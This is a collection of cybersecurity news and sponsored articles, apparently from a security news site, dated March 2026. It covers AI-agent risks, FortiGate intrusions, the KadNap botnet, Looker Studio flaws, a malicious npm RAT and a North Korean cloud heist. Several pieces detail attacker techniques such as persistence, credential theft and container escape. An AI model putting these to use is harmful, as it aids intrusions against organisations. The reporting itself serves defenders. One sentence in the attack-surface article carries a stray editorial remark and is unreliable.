2026-03-11 AI创业新闻

How to Stop AI Data Leaks: A Webinar Guide to Auditing Modern Agentic Workflows

Artificial Intelligence (AI) is no longer just a tool we talk to; it is a tool that does things for us. These are called AI Agents . They can send emails, move data, and even manage software on their own. But there is a problem.

While these agents make work faster, they also open a new “back door” for hackers. The Problem: “The Invisible Employee” Think of an AI Agent like a new employee who has the keys to every office in your building but doesn’t have a name tag. Because these agents act on their own, they often have access to sensitive information that nobody is watching. Hackers have figured this out.

They don’t need to break your password anymore—they just need to trick your AI Agent into doing the work for them. If your company uses AI to automate tasks, you might be at risk. Traditional security tools were built to protect humans, not “digital workers.” In our upcoming webinar, Beyond the Model: The Expanded Attack Surface of AI Agents , Rahul Parwani, Head of Product for AI Security at Airia , will break down exactly how hackers are targeting these agents and—more importantly—how you can stop them. What You Will Learn The “Dark Matter” of Identity: Why AI agents are often invisible to your security team and how to find them.

How Agents Get Tricked: Learn how a simple “bad idea” hidden in a document can make an AI agent leak your company secrets. The Safety Blueprint: Simple steps to give your AI agents the power they need without giving them “God Mode” over your data. Who Should Attend? If you are a business leader, an IT professional, or anyone responsible for keeping company data safe, this session is for you.

You don’t need to be a coding expert to understand these risks. Don’t let your AI become your biggest security hole. 📅 Save Your Spot Today: Register for the Webinar Here . Found this article interesting?

This article is a contributed piece from one of our valued partners. Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

FortiGate Devices Exploited to Breach Networks and Steal Service Account Credentials

Cybersecurity researchers are calling attention to a new campaign where threat actors are abusing FortiGate Next-Generation Firewall (NGFW) appliances as entry points to breach victim networks. The activity involves the exploitation of recently disclosed security vulnerabilities or weak credentials to extract configuration files containing service account credentials and network topology information, SentinelOne said in a report published today. The security outfit said the campaign has singled out environments tied to healthcare, government, and managed service providers. “FortiGate network appliances have considerable access to the environments they were installed to protect,” security researchers Alex Delamotte, Stephen Bromfield, Mary Braden Murphy, and Amey Patne said .

“In many configurations, this includes service accounts which are connected to the authentication infrastructure, such as Active Directory (AD) and Lightweight Directory Access Protocol (LDAP).” “This setup can enable the appliance to map roles to specific users by fetching attributes about the connection that’s being analyzed and correlating with the Directory information, which is useful in cases where role-based policies are set or for increasing response speed for network security alerts detected by the device.” However, the cybersecurity company noted that such access could be exploited by attackers who break into FortiGate devices through known vulnerabilities (e.g., CVE-2025-59718, CVE-2025-59719, and CVE-2026-24858) or misconfigurations . In one incident, the attackers are said to have breached a FortiGate appliance in November 2025 to create a new local administrator account named “support” and used it to set up four new firewall policies that allowed the account to traverse all zones without any restrictions. The threat actor then kept periodically checking to ensure the device was accessible, an action consistent with an initial access broker (IAB) establishing a foothold and selling it to other criminal actors for monetary gain. The next phase of the activity was detected in February 2026 when an attacker likely extracted the configuration file containing encrypted service account LDAP credentials.

“Evidence demonstrates the attacker authenticated to the AD using clear text credentials from the fortidcagent service account, suggesting the attacker decrypted the configuration file and extracted the service account credentials,” SentinelOne said. The attacker then leveraged the service account to authenticate to the victim’s environment and enroll rogue workstations in the AD, allowing them deeper access. Following this step, network scanning was initiated, at which point the breach was detected, and further lateral movement was halted. In another case investigated in late January 2026, attackers swiftly moved from firewall access to deploying remote access tools like Pulseway and MeshAgent.

In addition, the threat actor downloaded malware from a cloud storage bucket via PowerShell from Amazon Web Services (AWS) infrastructure. The Java malware, launched via DLL side-loading, was used to exfiltrate the contents of the NTDS.dit file and SYSTEM registry hive to an external server (“172.67.196[.]232”) over port 443. “While the actor may have attempted to crack passwords from the data, no such credential usage was identified between the time of credential harvesting and incident containment,” SentinelOne added. “NGFW appliances have become ubiquitous because they provide strong network monitoring capabilities for organizations by integrating security controls of a firewall with other management features, such as AD,” it added.

“However, these devices are high-value targets for actors with a variety of motivations and skill levels, from state-aligned actors conducting espionage to financially motivated attacks such as ransomware.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

KadNap Malware Infects 14,000+ Edge Devices to Power Stealth Proxy Botnet

Cybersecurity researchers have discovered a new malware called KadNap that’s primarily targeting Asus routers to enlist them into a botnet for proxying malicious traffic. The malware, first detected in the wild in August 2025, has expanded to over 14,000 infected devices, with more than 60% of victims located in the U.S., according to the Black Lotus Labs team at Lumen. A lesser number of infections have been detected in Taiwan, Hong Kong, Russia, the U.K., Australia, Brazil, France, Italy, and Spain. “KadNap employs a custom version of the Kademlia Distributed Hash Table ( DHT ) protocol, which is used to conceal the IP address of their infrastructure within a peer-to-peer system to evade traditional network monitoring,” the cybersecurity company said in a report shared with The Hacker News.

Compromised nodes in the network leverage the DHT protocol to locate and connect with a command-and-control (C2) server, thereby making it resilient to detection and disruption efforts. Once devices are successfully compromised, they are marketed by a proxy service named Doppelgänger (“doppelganger[.]shop”), which is assessed to be a rebrand of Faceless , another proxy service associated with TheMoon malware. Doppelgänger, according to its website, claims to offer resident proxies in over 50 countries that provide “100% anonymity.” The service is said to have launched in May/June 2025. Despite the focus on Asus routers, the operators of KadNap have been found to deploy the malware against an assorted set of edge networking devices.

Central to the attack is a shell script (“aic.sh”) that’s downloaded from the C2 server (“212.104.141[.]140”), which is responsible for initiating the process of conscripting the victim to the P2P network. The file creates a cron job to retrieve the shell script from the server at the 55-minute mark of every hour, rename it to “.asusrouter,” and run it. Once persistence is established, the script pulls a malicious ELF file, renames it to “kad,” and executes it. This, in turn, leads to the deployment of KadNap.

The malware is capable of targeting devices running both ARM and MIPS processors. KadNap is also designed to connect to a Network Time Protocol (NTP) server to fetch the current time and store it along with the host uptime. This information serves as a basis to create a hash that’s used to locate other peers in the decentralized network to receive commands or download additional files. The files – fwr.sh and /tmp/.sose – contains functionality to close port 22, the standard TCP port for Secure Shell (SSH), on the infected device and extract a list of C2 IP address:port combinations to connect to.

“In short, the innovative use of the DHT protocol allows the malware to establish robust communication channels that are difficult to disrupt, by hiding in the noise of legitimate peer-to-peer traffic,” Lumen said. Further analysis has determined that not all compromised devices communicate with every C2 server, indicating the infrastructure is being categorized based on device type and models. The Black Lotus Labs team told The Hacker News that Doppelgänger’s bots are being abused by threat actors in the wild. “One issue there has been since these Asus (and other devices) are also sometimes co-infected with other malware, it is tricky to say who exactly is responsible for a specific malicious activity,” the company said.

Users running SOHO routers are advised to keep their devices up to date, reboot them regularly, change default passwords, secure management interfaces, and replace models that are end-of-life and are no longer supported. “The KadNap botnet stands out among others that support anonymous proxies in its use of a peer-to-peer network for decentralized control,” Lumen concluded. “Their intention is clear, avoid detection and make it difficult for defenders to protect against.” New Linux Threat ClipXDaemon Emerges The disclosure comes as Cyble detailed a new Linux threat dubbed ClipXDaemon that’s designed to target cryptocurrency users by intercepting and altering copied wallet addresses. The clipper malware , delivered via Linux post-exploitation framework called ShadowHS, has been described as an autonomous cryptocurrency clipboard hijacker targeting Linux X11 environments.

Staged entirely in memory, the malware employs stealth techniques, such as process masquerading and Wayland session avoidance, while simultaneously monitoring the clipboard every 200 milliseconds and substituting cryptocurrency addresses with attacker-controlled wallets. It’s capable of targeting Bitcoin, Ethereum, Litecoin, Monero, Tron, Dogecoin, Ripple, and TON wallets. The decision to avoid execution in Wayland sessions is deliberate, as the display server protocol’s security architecture places additional controls, like requiring explicit user interaction, before applications can access the clipboard content. In disabling itself under such scenarios, the malware aims to eliminate noise and avoid runtime failure.

“ClipXDaemon differs fundamentally from traditional Linux malware. It contains no command-and-control (C2) logic, performs no beaconing, and requires no remote tasking,” the company said . “Instead, it monetizes victims directly by hijacking cryptocurrency wallet addresses copied in X11 sessions and replacing them in real time with attacker-controlled addresses.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

New “LeakyLooker” Flaws in Google Looker Studio Could Enable Cross-Tenant SQL Queries

Cybersecurity researchers have disclosed nine cross-tenant vulnerabilities in Google Looker Studio that could have permitted attackers to run arbitrary SQL queries on victims’ databases and exfiltrate sensitive data within organizations’ Google Cloud environments. The shortcomings have been collectively named LeakyLooker by Tenable. There is no evidence that the vulnerabilities were exploited in the wild. Following responsible disclosure in June 2025, the issues have been addressed by Google.

The list of security flaws is as follows - Cross Tenant Unauthorized Access - Zero-Click SQL Injection on Database Connectors Cross Tenant Unauthorized Access - Zero-Click SQL Injection Through Stored Credentials Cross Tenant SQL Injection on BigQuery Through Native Functions Cross-Tenant Data Sources Leak With Hyperlinks Cross Tenant SQL injection on Spanner and BigQuery Through Custom Queries on a Victim’s Data Source Cross Tenant SQL Injection on BigQuery and Spanner Through the Linking API Cross-Tenant Data Sources Leak With Image Rendering Cross-Tenant XS Leak on Arbitrary Data Sources With Frame Counting and Timing Oracles Cross Tenant Denial of Wallet Through BigQuery “The vulnerabilities broke fundamental design assumptions, revealed a new attack class, and could have allowed attackers to exfiltrate, insert, and delete data in victims’ services and Google Cloud environment,” security researcher Liv Matan said in a report shared with The Hacker News. “These vulnerabilities exposed sensitive data across Google Cloud Platform (GCP) environments, potentially affecting any organization using Google Sheets, BigQuery, Spanner, PostgreSQL, MySQL, Cloud Storage, and almost any other Looker Studio data connector.” Successful exploitation of the cross-tenant flaws could enable threat actors to gain access to entire datasets and projects across different cloud tenants. Attackers could scan for public Looker Studio reports or obtain access to private ones that use these connectors (e.g., BigQuery) and seize control of the databases, allowing them to run arbitrary SQL queries across the owner’s entire GCP project. Alternatively, a victim creates a report as public or shares it with a specific recipient, and uses a JDBC-connected data source such as PostgreSQL.

In this scenario, the attacker can take advantage of a logic flaw in the copy report feature that makes it possible to clone reports while retaining the original owner’s credentials, enabling them to delete or modify tables. Another high-impact path detailed by the cybersecurity company involved one-click data exfiltration, where sharing a specially crafted report forces a victim’s browser to execute malicious code that contacts an attacker-controlled project to reconstruct entire databases from logs. “The vulnerabilities broke the fundamental promise that a ‘Viewer’ should never be able to control the data they are viewing,” Matan said, adding they “could have let attackers exfiltrate or modify data across Google services like BigQuery and Google Sheets.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

The Zero-Day Scramble is Avoidable: A Guide to Attack Surface Reduction

You can’t control when the next critical vulnerability drops. You can control how much of your environment is exposed when it does. The problem is that most teams have more internet-facing exposure than they realise. Intruder’s Head of Security digs into why this happens and how teams can manage it deliberately.

Time-to-exploit is shrinking The larger and less controlled your attack surface is, the more opportunities exist for exploitation. And the window to act on them is shrinking fast. For the most serious vulnerabilities, disclosure to exploitation can be as short as 24 to 48 hours. Zero Day Clock projects that time-to-exploit will be just minutes by 2028.

That’s not a lot of time when you consider what has to happen before a patch is deployed: running scans, waiting for results, raising tickets, agreeing priorities, implementing applies to ’the fix’ too, happy to drop ‘verifying’ if that’s easier. If disclosure lands out of hours, it takes even longer. In many cases, vulnerable systems don’t need to be internet-facing in the first place. With visibility of the attack surface, teams can reduce unnecessary exposure upfront and avoid the scramble altogether when a new vulnerability drops.

When a zero-day drops on a Saturday ToolShell was an unauthenticated remote code execution vulnerability in Microsoft SharePoint. If an attacker could reach it, they could run code on your server - and because SharePoint is Active Directory-connected, they’d be starting in a highly sensitive part of your environment. This was a zero-day, meaning attackers were exploiting it before a patch was available. Microsoft disclosed on a Saturday and confirmed that Chinese state-sponsored groups had been exploiting it for up to two weeks before that.

By the time most teams knew about it, opportunistic attackers were scanning for exposed instances and exploiting at scale. Intruder’s research found thousands of publicly accessible SharePoint instances at the time of disclosure - despite the fact that SharePoint doesn’t need to be internet-facing. Every one of those exposures was unnecessary - and every unpatched server was an open door. Why exposures get missed So why do exposures so often get missed by security teams?

In a typical external scan, informational findings sit beneath hundreds of criticals, highs, mediums, and lows. But that information can include detections that represent real exposure risk, such as: An exposed SharePoint server A database exposed to the internet, such as MySQL or Postgres Other protocols, which should usually be reserved for the internal network, such as RDP and SNMP Here’s a real example of what that looks like: In vulnerability scanning terms, classifying these as informationals sometimes makes sense. If the scanner sits on the same private subnet as the targets, an exposed service might genuinely be low risk. But when that same service is exposed to the internet, it carries real risk even without a known vulnerability attached to it.

Yet. The danger is that traditional scan reports treat both cases the same way, so the real risks slip through the gaps. What proactive attack surface reduction actually involves There are three key elements to making attack surface reduction work in practice. 1.

Asset discovery: define your attack surface Before you can reduce your attack surface, you need a clear picture of what you own and what’s externally reachable. That starts with identifying shadow IT - systems your organization owns or operates but isn’t currently scanning or monitoring. Closing that gap is important, and there are three key elements we recommend having in place: Integrating with your cloud and DNS providers so that when new infrastructure is created, it’s automatically picked up and scanned. This is one area where defenders have a genuine advantage: you can integrate directly with your own environments, attackers can’t.

Using subdomain enumeration to surface externally reachable hosts that aren’t in your inventory. This matters especially after acquisitions, where you may be inheriting infrastructure you don’t yet have visibility of. Identifying infrastructure hosted with smaller, unknown cloud providers . You may have a security policy that mandates development teams only use your primary cloud provider, but you need to check that practice is being followed.

Watch a deep dive into these techniques:

Treat exposure as risk The next step is treating attack surface exposure as a risk category in its own right. That requires a detection capability that identifies which informational findings represent an exposure and assigns appropriate severity. An exposed SharePoint instance, for example, might reasonably be treated as a medium-risk issue.

It also means carving out space for this work in how you prioritize . If strategic efforts like attack surface reduction are always competing against urgent patching, they will always lose. That might mean setting aside time each quarter to review and reduce exposure, or assigning clear ownership so someone is accountable for it - not just when a crisis hits, but routinely. 3.

Continuous monitoring Attack surface reduction isn’t a one-time exercise. Exposure changes constantly - a firewall rule gets edited, a new service gets deployed, a subdomain gets forgotten - and your team needs to detect those changes quickly. Vulnerability scans take time to complete, and running full scans daily isn’t usually possible. Daily port scanning is a better fit.

It’s lightweight, fast, and means you can detect newly exposed services as they appear. If someone edits a firewall rule and accidentally exposes Remote Desktop, you find out the day it happens - not at the next scheduled scan, which could be up to a month later. Fewer exposed services, fewer surprises When unnecessary services aren’t exposed in the first place, they’re far less likely to be caught up in the mass exploitation that follows a critical disclosure. That means fewer surprises, less urgent scrambling, and more time to respond deliberately when new vulnerabilities emerge.

Intruder automates this process - from discovering shadow IT and monitoring for new exposures, to alerting your team the moment something changes - so your security team can stay ahead of exposure rather than reacting to it. If you want to see what’s exposed in your environment, book a demo of Intruder . Found this article interesting? This article is a contributed piece from one of our valued partners.

APT28 Uses BEARDSHELL and COVENANT Malware to Spy on Ukrainian Military

The Russian state-sponsored hacking group tracked as APT28 has been observed using a pair of implants dubbed BEARDSHELL and COVENANT to facilitate long‑term surveillance of Ukrainian military personnel. The two malware families have been put to use since April 2024, ESET said in a new report shared with The Hacker News. APT28, also tracked as Blue Athena, BlueDelta, Fancy Bear, Fighting Ursa, Forest Blizzard (formerly Strontium), FROZENLAKE, Iron Twilight, ITG05, Pawn Storm, Sednit, Sofacy, and TA422, is a nation-state actor affiliated with Unit 26165 of the Russian Federation’s military intelligence agency GRU. The threat actor’s malware arsenal consists of tools like BEARDSHELL and COVENANT, along with another program codenamed SLIMAGENT that’s capable of logging keystrokes, capturing screenshots, and collecting clipboard data.

SLIMAGENT was first publicly documented by the Computer Emergency Response Team of Ukraine (CERT-UA) in June 2025. SLIMAGENT, per the Slovakian cybersecurity company, has its roots in XAgent , another implant used by APT28 in the 2010s to facilitate remote control and data exfiltration . This is based on code similarities discovered between SLIMAGENT and previously unknown samples deployed in attacks targeting governmental entities in two European countries as far back as 2018. It’s assessed that the 2018 artifacts and the 2024 SLIMAGENT sample originated from XAgent, with ESET’s analysis uncovering overlaps in the keylogging between SLIMAGENT and an XAgent sample detected in the wild in late 2014.

“SLIMAGENT emits its espionage logs in the HTML format, with the application name, the logged keystrokes, and the window name in blue, red, and green, respectively,” ESET said. “The XAgent keylogger also produces HTML logs using the same color scheme.” Also deployed in connection with SLIMAGENT is another backdoor referred to as BEARDSHELL that’s capable of executing PowerShell commands on compromised hosts. It uses the legitimate cloud storage service Icedrive for command-and-control (C2). Code comparison between SLIMAGENT (left) and XAgent (right) A noteworthy aspect of the malware is that it utilizes a distinctive obfuscation technique referred to as opaque predicate , which is also found in XTunnel (aka X-Tunnel), a network traversal and pivoting tool used by APT28 in the 2016 Democratic National Committee (DNC) hack.

The tool provides a secure tunnel to an external C2 server. “The shared use of this rare obfuscation technique, combined with its colocation with SLIMAGENT, leads us to assess with high confidence that BEARDSHELL is part of Sednit’s custom arsenal,” ESET added. A third major piece of the threat actor’s toolkit is COVENANT, an open-source .NET post-exploitation framework that has been “heavily” modified to support long-term espionage and to implement a new cloud-based network protocol that abuses the Filen cloud storage service for C2 since July 2025. Previously, APT28’s COVENANT variant was said to have used pCloud (in 2023) and Koofr (in 2024-2025).

“These adaptations show that Sednit developers acquired deep expertise in Covenant – an implant whose official development ceased in April 2021 and may have been considered unused by defenders,” ESET said. “This surprising operational choice appears to have paid off: Sednit has successfully relied on Covenant for several years, particularly against selected targets in Ukraine .” This is not the first time the adversarial collective has embraced the dual-implant strategy. In 2021, Trellix revealed that APT28 deployed Graphite, a backdoor that employed OneDrive for C2, and PowerShell Empire in attacks targeting high-ranking government officials overseeing national security policy and individuals in the defense sector in Western Asia. Found this article interesting?

Threat Actors Mass-Scan Salesforce Experience Cloud via Modified AuraInspector Tool

Salesforce has warned of an increase in threat actor activity that’s aimed at exploiting misconfigurations in publicly accessible Experience Cloud sites by making use of a customized version of an open-source tool called AuraInspector. The activity, per the company, involves the exploitation of customers’ overly permissive Experience Cloud guest user configurations to obtain access to sensitive data. “Evidence indicates the threat actor is leveraging a modified version of the open-source tool AuraInspector […] to perform mass scanning of public-facing Experience Cloud sites,” Salesforce said . “While the original AuraInspector is limited to identifying vulnerable objects by probing API endpoints that these sites expose (specifically the /s/sfsites/aura endpoint), the actor has developed a custom version of the tool capable of going beyond identification to actually extract data — exploiting overly permissive guest user settings.” AuraInspector refers to an open-source tool designed to help security teams identify and audit access control misconfigurations within the Salesforce Aura framework.

It was released by Google-owned Mandiant in January 2026. Publicly accessible Salesforce sites use a dedicated guest user profile that enables an unauthenticated user to access landing pages, FAQs, and knowledge articles. However, if this profile is misconfigured with excessive permissions, it can potentially grant unauthenticated users access to more data than intended. As a result, an attacker could exploit this security weakness to directly query Salesforce CRM objects without logging in.

For this attack to work, two conditions have to be satisfied by Experience Cloud customers: they are using the guest user profile and have not adhered to Salesforce’s recommended configuration guidance. “At this time, we have not identified any vulnerability inherent to the Salesforce platform associated with this activity,” Salesforce said . “These attempts are focused on customer configuration settings that, if not properly secured, may increase exposure.” The company attributed the campaign to a known threat actor group without taking its name, raising the possibility that it could be the work of ShinyHunters (aka UNC6240), which has a history of targeting Salesforce environments via third-party applications from Salesloft and Gainsight . Salesforce is recommending customers review their Experience Cloud guest user settings, ensure the Default External Access for all objects is set to Private, disable guest users’ access to public APIs, restrict visibility settings to prevent guest users from enumerating internal organization members, disable self-registration if not required, and monitor logs for unusual queries.

“This threat actor activity reflects a broader trend of ‘ identity-based ‘ targeting,” it added. “Data harvested in these scans, such as names and phone numbers – is often used to build follow-on targeted social engineering and ‘vishing’ (voice phishing) campaigns.” Update According to screenshots shared by Dark Web Informer on X, ShinyHunters has claimed to have breached “several hundred” companies as part of the Salesforce Aura Campaign. Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

CISA Flags SolarWinds, Ivanti, and Workspace One Vulnerabilities as Actively Exploited

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday added three security flaws to its Known Exploited Vulnerabilities ( KEV ) catalog, based on evidence of active exploitation. The vulnerability list is as follows - CVE-2021-22054 (CVSS score: 7.5) - A server-side request forgery ( SSRF ) vulnerability in Omnissa Workspace One UEM (formerly VMware Workspace One UEM) that could allow a malicious actor with network access to UEM to send requests without authentication and to gain access to sensitive information. CVE-2025-26399 (CVSS score: 9.8) - A deserialization of untrusted data vulnerability in the AjaxProxy component of SolarWinds Web Help Desk that could allow an attacker to run commands on the host machine.

CVE-2026-1603 (CVSS score: 8.6) - An authentication bypass using an alternate path or channel vulnerability in Ivanti Endpoint Manager that could allow a remote unauthenticated attacker to leak specific stored credential data. The addition of CVE-2025-26399 comes in the wake of reports from Microsoft and Huntress that threat actors are exploiting security flaws in SolarWinds Web Help Desk to obtain initial access. The activity is believed to be the work of the Warlock ransomware crew. CVE-2021-22054, on the other hand, was flagged by GreyNoise in March 2025 as being exploited in conjunction with several other SSRF vulnerabilities in other products as part of a coordinated campaign.

There are currently no details on how CVE-2026-1603 is being weaponized in the wild. As of writing, Ivanti’s security bulletin has not been updated to reflect the exploitation status. To counter the risk posed by active threats, Federal Civilian Executive Branch (FCEB) agencies have been ordered to apply the fix for SolarWinds Web Help Desk by March 12, 2026, and the remaining two by March 23, 2026. “These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise,” CISA said.

Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Malicious npm Package Posing as OpenClaw Installer Deploys RAT, Steals macOS Credentials

Cybersecurity researchers have discovered a malicious npm package that masquerades as an OpenClaw installer to deploy a remote access trojan (RAT) and steal sensitive data from compromised hosts. The package, named “ @openclaw-ai/openclawai ,” was uploaded to the registry by a user named “openclaw-ai” on March 3, 2026. It has been downloaded 178 times to date. The library is still available for download as of writing.

JFrog, which discovered the package, said it’s designed to steal system credentials, browser data, crypto wallets, SSH keys, Apple Keychain databases, and iMessage history, as well as install a persistent RAT with remote access capabilities, SOCKS5 proxy, and live browser session cloning. It’s tracking the activity under the name GhostClaw. “The attack is notable for its broad data collection, its use of social engineering to harvest the victim’s system password, and the sophistication of its persistence and C2 [command-and-control] infrastructure,” security researcher Meitar Palas said . “Internally, the malware identifies itself as GhostLoader.” The malicious logic is triggered by means of a postinstall hook, which re-installs the package globally using the command: “npm i -g @openclaw-ai/openclawai.” Once the installation is complete, the OpenClaw binary points to “scripts/setup.js” by means of the “bin” property in the “package.json” file.

It’s worth noting that the “ bin “ field is used to define executable files that should be added to the user’s PATH during package installation. This, in turn, turns the package into a globally accessible command-line tool. The file “setup.js” serves as the first-stage dropper that, upon running, displays a convincing fake command-line interface with animated progress bars to give the impression that OpenClaw is being installed on the host. After the purported installation step is complete, the script shows a bogus iCloud Keychain authorization prompt, asking users to enter their system password.

Simultaneously, the script retrieves an encrypted second-stage JavaScript payload from the C2 server (“trackpipe[.]dev”), which is then decoded, written to a temporary file, and spawned as a detached child process to continue running in the background. The temp file is deleted after 60 seconds to cover up traces of the activity. “If the Safari directory is inaccessible (no Full Disk Access), the script displays an AppleScript dialog urging the user to grant FDA to Terminal, complete with step-by-step instructions and a button that opens System Preferences directly,” JFrog explained. “This enables the second-stage payload to steal Apple Notes, iMessage, Safari history, and Mail data.” The JavaScript second-stage, featuring about 11,700 lines, is a full-fledged information stealer and RAT framework that’s capable of persistence, data collection, browser decryption, C2 communication, a SOCKS5 proxy, and live browser cloning.

It’s also equipped to steal a wide range of data - macOS Keychain, including both the local login.keychain-db and all iCloud Keychain databases Credentials, cookies, credit cards, and autofill data from all Chromium-based browsers, such as Google Chrome, Microsoft Edge, Brave, Vivaldi, Opera, Yandex, and Comet Data from desktop wallet applications and browser extensions Cryptocurrency wallet seed phrases SSH keys Developer and cloud credentials for AWS, Microsoft Azure, Google Cloud, Kubernetes, Docker, and GitHub Artificial intelligence (AI) agent configurations, and Data protected by the FDA, including Apple Notes, iMessage history, Safari browsing history, Mail account configurations, and Apple account information In the final stage, the collected data is compressed into a tar.gz archive and exfiltrated through multiple channels, including directly to the C2 server, Telegram Bot API, and GoFile.io. What’s more, the malware enters a persistent daemon mode that allows it to monitor clipboard content every three seconds and transmit any data that matches one of the nine pre-defined patterns corresponding to private keys, WIF key , SOL private key, RSA private key, BTC address, Ethereum address, AWS key, OpenAI key, and Strike key. Other features include keeping tabs on running processes, scanning incoming iMessage chats in real-time, and executing commands sent from the C2 server to run arbitrary shell command, open a URL on the victim’s default browser, download additional payloads, upload files, start/stop a SOCKS5 proxy, list available browsers, clone a browser profile and launch it in headless mode, stop the browser clone, self-destruct, and update itself. The browser cloning function is particularly dangerous as it launches a headless Chromium instance with the existing browser profile that contains cookies, login, and history data.

This gives the attacker a fully authenticated browser session without the need for accessing credentials. “The @openclaw-ai/openclawai package combines social engineering, encrypted payload delivery, broad data collection, and a persistent RAT into a single npm package,” JFrog said. “The polished fake CLI installer and Keychain prompt are convincing enough to extract system passwords from cautious developers, and once captured, those credentials unlock macOS Keychain decryption and browser credential extraction that would otherwise be blocked by OS-level protections.” Update The package has been removed from the npm registry as of March 10, 2026. Found this article interesting?

UNC4899 Breached Crypto Firm After Developer AirDropped Trojanized File to Work Device

The North Korean threat actor known as UNC4899 is suspected to be behind a sophisticated cloud compromise campaign targeting a cryptocurrency organization in 2025 to steal millions of dollars in cryptocurrency. The activity has been attributed with moderate confidence to the state-sponsored adversary, which is also tracked under the cryptonyms Jade Sleet, PUKCHONG, Slow Pisces, and TraderTraitor. “This incident is notable for its blend of social engineering, exploitation of personal-to-corporate device peer-to-peer data (P2P) transfer mechanisms, workflows, and eventual pivot to the cloud to employ living-off-the-cloud (LOTC) techniques,” the tech giant noted in its H1 2026 Cloud Threat Horizons Report shared with The Hacker News. Upon gaining access to the cloud environment, the attackers are said to have abused legitimate DevOps workflows to harvest credentials, break out of the confines of containers, and tamper with Cloud SQL databases to facilitate the cryptocurrency theft.

The attack chain, Google Cloud said, represents a progression of what started with the compromise of a developer’s personal device to their corporate workstation, before jumping to the cloud to make unauthorized modifications to the financial logic. It all started with the threat actors using social engineering ploys to deceive the developer into downloading an archive file as part of a supposed open-source project collaboration. The developer then transferred the same file to their company device over AirDrop. “Using their AI-assisted Integrated Development Environment (IDE), the victim then interacted with the archive’s contents, eventually executing the embedded malicious Python code, which spawned and executed a binary that masqueraded as the Kubernetes command-line tool,” Google said.

The binary then contacted an attacker-controlled domain and acted as a backdoor to the victim’s corporate machine, giving the attackers a way to pivot to the Google Cloud environment by likely using authenticated sessions and available credentials. This step was followed by an initial reconnaissance phase aimed at gathering information about various services and projects. The attack moved to the next phase with the discovery of a bastion host , with the adversary modifying its multi-factor authentication (MFA) policy attribute to access it and perform additional reconnaissance, including navigating to specific pods within the Kubernetes environment. Subsequently, UNC4899 adopted a living-off-the-cloud (LotC) approach to configure persistence mechanisms by altering Kubernetes deployment configurations so as to execute a bash command automatically when new pods are created.

The command, for its part, downloaded a backdoor. Some of the other steps carried out by the threat actor are listed below - Kubernetes resources tied to the victim’s CI/CD platform solution were modified to inject commands that displayed the service account tokens onto the logs. The attacker obtained a token for a high-privileged CI/CD service account, permitting them to escalate their privileges and conduct lateral movement, specifically targeting a pod that handled network policies and load balancing. The stolen service account token was used to authenticate to the sensitive infrastructure pod running in privileged mode, escape the container, and deploy a backdoor for persistent access.

Another round of reconnaissance was conducted by the threat actor before shifting their attention to a workload responsible for managing customer information, such as user identities, account security, and cryptocurrency wallet information. The attacker used it to extract static database credentials that were stored insecurely in the pod’s environment variables. The credentials were then abused to access the production database via Cloud SQL Auth Proxy and execute SQL commands to make user account modifications. This included password resets and MFA seed updates for several high-value accounts.

The attack culminated with the use of the compromised accounts to successfully withdraw several million dollars in digital assets. The incident “highlights the critical risks posed by the personal-to-corporate P2P data transfer methods and other data bridges, privileged container modes, and the unsecured handling of secrets in a cloud environment,” Google said. “Organizations should adopt a defense-in-depth strategy that rigorously validates identity, restricts data transfer on endpoints, and enforces strict isolation within cloud runtime environments to limit the blast radius of an intrusion event.” To counter the threat, organizations are advised to implement context-aware access and phishing-resistant MFA, ensure only trusted images are deployed, isolate compromised nodes from establishing connectivity with external hosts, monitor for unexpected container processes, adopt robust secrets management, enforce policies to disable or restrict peer-to-peer file sharing using AirDrop or Bluetooth and mounting of unmanaged external media on corporate devices. Found this article interesting?

⚡ Weekly Recap: Qualcomm 0-Day, iOS Exploit Chains, AirSnitch Attack & Vibe-Coded Malware

Another week in cybersecurity. Another week of “you’ve got to be kidding me.” Attackers were busy. Defenders were busy. And somewhere in the middle, a whole lot of people had a very bad Monday morning.

That’s kind of just how it goes now. The good news? There were some actual wins this week. Real ones.

The kind where the good guys showed up, did the work, and made a dent. It doesn’t always happen, so when it does, it’s worth noting. The bad news? For every win, there’s a fresh headache waiting right behind it.

New tricks, old tricks dressed up in new clothes, and a few things that’ll make you want to go touch grass and never log back in. But you will. We all do. So here’s everything that mattered this week — the wins, the warnings, and the stuff you really shouldn’t ignore.

⚡ Threat of the Week Tycoon 2FA and LeakBase Operations Dismantled — The infrastructure hosting the Tycoon2FA service, which Europol said was among the largest adversary-in-the-middle (AitM) phishing operations worldwide, has been dismantled by a coalition of security companies and law enforcement agencies. “Taking down infrastructure associated with Tycoon 2FA and identifying the individual allegedly responsible for creating this prolific hacking tool will have a significant impact on overall MFA credential phishing, and hopefully strike a blow to the world’s most prolific AitM phishing-as-a-service,” Proofpoint said in a statement shared with The Hacker News. Phishing kits and PhaaS platforms have become an Achilles’ heel in recent years, streamlining and democratizing phishing attacks for less technically savvy hackers by providing them with a suite of tools to create convincing emails and phishing pages that unsuspecting victims will engage with. For a relatively modest fee, aspiring cybercriminals can subscribe to these services and carry out phishing attacks at scale.

In a similar development, authorities also took down LeakBase , one of the world’s largest online forums for cybercriminals to buy and sell stolen data and cybercrime tools. While the disruption is a positive development, it’s known that such takedowns typically create only short-term disruptions, as the ecosystem adapts by migrating to other forums or more resilient distribution channels, like Telegram. Shadow AI Is EVERYWHERE. Here’s How You Can Find and Secure It Shadow AI is quietly accessing sensitive data across your SaaS environment.

Learn how to close AI blind spots and get ahead of data exposure risks with this new guide. Get Answers Now ➝ 🔔 Top News Anthropic Finds 22 Firefox Vulnerabilities in Firefox — Anthropic said it discovered 22 new security vulnerabilities in the Firefox web browser using its Claude Opus 4.6 large language model (LLM)as part of a security partnership with Mozilla. Of these, 14 have been classified as high, seven have been classified as moderate, and one has been rated low in severity. The issues were addressed in Firefox 148, released late last month.

